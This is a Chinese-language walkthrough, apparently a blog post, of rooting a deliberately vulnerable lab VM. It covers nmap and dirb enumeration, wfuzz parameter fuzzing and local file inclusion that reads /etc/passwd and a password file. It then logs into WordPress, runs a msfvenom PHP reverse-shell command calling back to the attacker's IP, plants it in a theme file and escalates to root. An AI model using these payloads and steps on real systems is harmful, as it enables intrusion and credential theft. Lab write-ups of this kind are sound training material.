1.使用virtualbox打开后出现如下界面:
2.主要思路如下:
3.发现主机IP
$ nmap -sP 192.168.0.1/24
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-22 08:50 EST
Nmap scan report for 192.168.0.1
Host is up (0.0039s latency).
Nmap scan report for 192.168.0.101
Host is up (0.063s latency).
Nmap scan report for 192.168.0.104
Host is up (0.000083s latency).
Nmap scan report for 192.168.0.105
Host is up (0.057s latency).
Nmap scan report for 192.168.0.106
Host is up (0.00066s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.48 seconds可以发现多了一台192.168.0.106的主机 所以靶机的IP为192.168.0.106
4.扫描端口,发现主机对应运行的软件(服务)
$ nmap -Pn 192.168.0.106
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-22 08:51 EST
Nmap scan report for 192.168.0.106
Host is up (0.000093s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http发现主机开启了22,80端口先从比较容易的80端口入手
端口与之对应的服务关系:
端口与服务对应关系_weixin_30765475的博客-程序员ITS404 - 程序员ITS404
5.浏览器访问靶机192.168.0.106:80 查看界面和源代码未发现异常
6.开始目录扫描,使用工具dirb dirb教程_hyled-Ava的博客-CSDN博客_dirb使用
$ dirb http://192.168.0.106
...(此处省略许多内容)
---- Scanning URL: http://192.168.0.106/ ----
+ http://192.168.0.106/dev (CODE:200|SIZE:131)
+ http://192.168.0.106/index.php (CODE:200|SIZE:136)
...(此处省略许多内容)
---- Entering directory: http://192.168.0.106/wordpress/ ----
...(此处省略许多内容)
(发现有cms:wordpress)
(再次扫描,寻找txt,php,zip文件,一般这类文件中可能包含一些敏感信息)
$ dirb http://192.168.0.106 -X .txt,.zip,.php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jan 22 09:15:23 2022
URL_BASE: http://192.168.0.106/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt,.php,.zip) | (.txt)(.php)(.zip) [NUM = 3]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.106/ ----
+ http://192.168.0.106/image.php (CODE:200|SIZE:147)
+ http://192.168.0.106/index.php (CODE:200|SIZE:136)
+ http://192.168.0.106/secret.txt (CODE:200|SIZE:412)
-----------------
END_TIME: Sat Jan 22 09:15:25 2022
DOWNLOADED: 13836 - FOUND: 3
7.发现了有个 secret.txt文件
$ curl http://192.168.0.106/secret.txt
Looks like you have got some secrets.
Ok I just want to do some help to you.
Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck
Learn from here a basic tool with good usage for OSCP.
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
//see the location.txt and you will get your next move//内容中让我们给每一个php文件(index.php,image.php)进行参数破解(利用https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web),然后再访问“location.txt”这个文件
8.通过所提供链接上的说明,可以暴破出一个参数 "file"
$ wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.0.106/index.php?FUZZ=1
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.0.106/index.php?FUZZ=1
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000341: 200 7 L 19 W 206 Ch "file"
Total time: 0.514398
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 1848.7609.查看 http://192.168.0.106/index.php?file=location.txt
$ curl http://192.168.0.106/index.php?file=location.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
</html>内容提示另一个php文件有一个参数“secrettier360”
10.可能会发生“本地文件包含漏洞”并且“/etc/passwd”是一个敏感文件
查看http://192.168.0.106/image.php?secrettier360=/etc/passwd
$ curl http://192.168.0.106/image.php?secrettier=/etc/passwd
与开头界面“find password.txt file in my directory”
11.查看 http://192.168.0.106/image.php?secrettier360=/home/saket/password.txt
$ curl http://192.168.0.106/home/saket/password.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>follow_the_ippsec
</html>发现一个密码:follow_the_ippsec 到这里对于php文件就结束了
12.由于发现了wordpress 就可以去访问 并且也知道了用户名与密码 登录后台
13.找到 Appearance -> Theme Editer -> secret.php 因为只有这个php文件才能被修改并去保存上传 可以利用这个使靶机向本机生成反弹连接 之后就可以进入靶机
使用 msfvenom 生成php反弹连接代码 Msfvenom命令总结大全_卿's Blog-CSDN博客
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.104 LPORT=8888 -o shell.php将生成的php文件内容复制粘贴至secret.php上面,并上传
14.开启msfconsole监听8888端口MSF建立webshell后门,并监听端口建立session连接_土拨鼠挖洞中的博客-CSDN博客_msf监听端口
15.访问一下secret.php文件 触发反弹连接
http://192.168.0.106/wordpress/wp-content/themes/twentynineteen/secret.php
16.使用msfconsole 找到普通用户提升为root用户的文件,并且编译它
使用upload上传至/tmp目录(每个用户都有权限访问它) 用chmod添加运行权限 然后运行它
17.最终获得root权限任务完成
1153
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
